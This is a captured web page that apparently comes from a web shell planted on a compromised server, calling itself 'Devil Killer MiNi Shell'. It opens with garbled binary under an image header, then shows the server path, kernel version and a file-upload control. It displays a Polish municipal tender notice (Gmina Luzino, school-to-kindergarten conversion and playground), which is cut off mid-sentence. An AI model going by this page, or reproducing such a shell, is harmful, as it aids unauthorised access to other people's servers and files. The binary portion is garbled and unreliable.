JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220415/0012446302-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ZMIANA SPOSOBU UŻYTKOWANIA WRAZ Z PRZEBUDOWĄ POMIESZCZEŃ SZKOŁY PODSTAWOWEJ NR 1 W LUZINIE NA PRZEDSZKOLE I RAMPĄ PODJAZDOWĄ ORAZ BUDOWA PLACU ZABAW PRZY BUDYNKU SZKOŁY PODSTAWOWEJ NR 1W LUZINIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUZINO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675340</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ofiar Stutthofu 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Luzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@luzino.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.luzino.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZMIANA SPOSOBU UŻYTKOWANIA WRAZ Z PRZEBUDOWĄ POMIESZCZEŃ SZKOŁY PODSTAWOWEJ NR 1 W LUZINIE NA PRZEDSZKOLE I RAMPĄ PODJAZDOWĄ ORAZ BUDOWA PLACU ZABAW PRZY BUDYNKU SZKOŁY PODSTAWOWEJ NR 1W LUZINIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55219a80-bc94-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00124463</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037003/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Zmiana sposobu użytkowania wraz z przebudową pomieszczeń Szkoły Podstawowej nr 1 w Luzinie na przedszkole i rampą podjazdową oraz budowa placu zabaw przy budynku Szkoły Podstawowej nr 1 w Luzinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia jest dofinansowany w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 współfinansowanego z Europejskiego Funduszu Społecznego. Zgodnie z umową o dofinansowanie RPPM.03.01.00-22-0072/20-00 zawartą w dniu 19.10.2021 r. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/ug_luzino/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne sporządzenia, wysyłania i odbierania korespondencji elektronicznej, przekazywane przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje .<br/>Oferta musi być sporządzona w języku polskim, w postaci elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym, lub podpisem zaufanym lub podpisem osobistym. <br/>Ofertę sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 ze zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych, np. .pdf, .doc, .docx, .rtf,.xps, .odt.<br/>Ponadto, do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, lub podpisu zaufanego lub podpisu osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119, str. 1; z<br/>2018 r. Nr 127 poz. 2, z 2021r. nr 74 poz. 35), dalej „RODO”, informujemy, że: 1) administratorem<br/>Pani/Pana danych osobowych jest Gmina Luzino, 2) kontakt do inspektora ochrony danych osobowych<br/>w Gminie Luzino, adres e-mail: inspektor.abi@gmail.com , 3) Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie art. 6 ust. 1 lit. c RODO, w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym; 4) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; 5) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>- konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 8) posiada Pan/Pani: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia<br/>Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników; c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; 9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust.1 lit. c RODO. 3.16.) RODO ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">2. Jednocześnie Zamawiający przypomina o ciążącym na<br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust.<br/>5 RODO. 3. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO,<br/>wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia. 4. Wystąpienie z<br/>żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego. 5. Przysługuje Pani/Panu<br/>prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana<br/>danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 zamówienia – Zmiana sposobu użytkowania pomieszczeń Szkoły Podstawowej w Luzinie na przedszkole tj. zmiana sposobu użytkowania 7 pomieszczeń szkolnych – sal lekcyjnych wraz z zapleczem i rampą podjazdową. <br/>Zakres robót, w przedmiotowej części zamówienia, w szczególności obejmuje:<br/>1)	wydzielenie przedmiotowej części przedszkolnej,<br/>2)	wyposażenie klatki schodowej w stałe kurtyny dymowe,<br/>3)	przebudowę pomieszczeń toalet, <br/>4)	wymianę stolarki drzwiowej w klatce schodowej, <br/>5)	wykonanie zewnętrznej rampy podjazdowej wraz ze schodami zewnętrznymi,<br/>6)	demontaż ścianki działowej przy klatce schodowej,<br/>7)	wykonanie obudów grzejników w pomieszczeniach toalet oraz salach dydaktycznych,<br/>8)	wykonanie okładzin ściennych.<br/>Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do, co najmniej głównych elementów składających się na przedmiot zamówienia, odpowiednio do części zamówienia, określone zostały w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących Załącznik nr 4 do niniejszej SWZ.<br/>Do każdej normy, przywołanej zarówno, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, odpowiednio dla części nr 1 i 2 zamówienia, dopisuje się określenie „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena przeprowadzona będzie w skali punktowej 0-100 pkt. Oferta najtańsza otrzyma 100 pkt., pozostałe proporcjonalnie mniej (proporcjonalność liniowa).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 zamówienia - Budowa placu zabaw przy budynku Szkoły Podstawowej nr 1 w Luzinie.<br/>Zakres robót, w przedmiotowej części zamówienia, w szczególności obejmuje:<br/>1)	nawierzchnię bezpieczną, <br/>2)	dostawę i montaż, urządzeń i elementów placu zabaw, takich jak:<br/>a)	huśtawka wagowa, <br/>b)	bujak,<br/>c)	tablica edukacyjna gra oxo,<br/>d)	tablica edukacyjna,<br/>e)	tablica informacyjna z regulaminem,<br/>f)	ławka,<br/>g)	kosz na śmieci,<br/>3)	obrzeża elastyczne,<br/>4)	prace rozbiórkowe i porządkowe. <br/>Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do, co najmniej głównych elementów składających się na przedmiot zamówienia, odpowiednio do części zamówienia, określone zostały w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących Załącznik nr 4 do niniejszej SWZ.<br/>Do każdej normy, przywołanej zarówno, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, odpowiednio dla części nr 1 i 2 zamówienia, dopisuje się określenie „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena przeprowadzona będzie w skali punktowej 0-100 pkt. Oferta najtańsza otrzyma 100 pkt., pozostałe proporcjonalnie mniej (proporcjonalność liniowa).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">DOTYCZY SEKCJI V - KWALIFIKACJA WYKONAWCÓW <br/>W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. – o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zamawiający wprowadza następujące zmiany:<br/>„12.5 Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, odpowiednio: <br/>1) wymienionych w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanych na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) których beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) których jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>12.6 Wykluczenie następuje na okres trwania okoliczności określonych w pkt 12.5. <br/>12.7 W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie pkt 12.5, zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego. <br/>12.8 Osoba lub podmiot podlegające wykluczeniu na podstawie pkt 12.5, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub dopuszczenie do udziału w konkursie lub biorą udział w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, podlegają karze pieniężnej. <br/>12.9 Karę pieniężną, o której mowa w pkt. 12.8, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 